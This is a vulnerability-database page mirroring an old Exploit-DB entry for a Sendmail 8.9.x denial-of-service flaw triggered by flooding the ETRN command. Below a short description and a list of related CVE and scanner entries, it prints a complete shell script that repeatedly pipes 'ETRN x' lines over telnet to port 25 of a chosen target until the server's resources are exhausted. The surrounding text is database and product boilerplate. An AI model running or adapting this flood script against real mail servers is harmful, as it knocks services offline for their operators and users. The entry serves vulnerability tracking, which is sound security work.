Lucene search
+L

Eric Allman Sendmail 8.9.1/8.9.3 - ETRN Denial of Service

🗓️ 22 Dec 1999 00:00:00Reported by Michal ZalewskiType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Low-bandwidth denial of service vulnerability exists in Sendmail ETRN command, exhausting resources.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
Sendmail < 8.10.1 ETRN Command Remote DoS
18 Aug 200400:00
nessus
nessus
Tenable Nessus
Sendmail Crafted ETRN Commands Remote DoS
11 Mar 200300:00
nessus
cve
CVE
CVE-1999-1109
9 Mar 200205:00
cve
cvelist
Cvelist
CVE-1999-1109
9 Mar 200205:00
cvelist
euvd
EUVD
EUVD-1999-1090
7 Oct 202500:30
euvd
nvd
NVD
CVE-1999-1109
22 Dec 199905:00
nvd
openvas
OpenVAS
Sendmail 8.x - 8.10.0 ETRN Command DoS Vulnerability
3 Nov 200500:00
openvas
source: https://www.securityfocus.com/bid/904/info

There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server.

#!/bin/sh

TARGET=localhost
COUNT=150
SLEEP=1

echo "gurghfrbl.sh - (c) lcamtuf '99"
echo -n "Tickle"

while :; do
echo -n "."
(
NIC=0
while [ "$NIC" -lt "$COUNT" ]; do
echo "ETRN x"
done
) | telnet $TARGET 25 &>/dev/null &
sleep $SLEEP
killall -9 telnet &>/dev/null
done

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

09 Jul 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.07169
32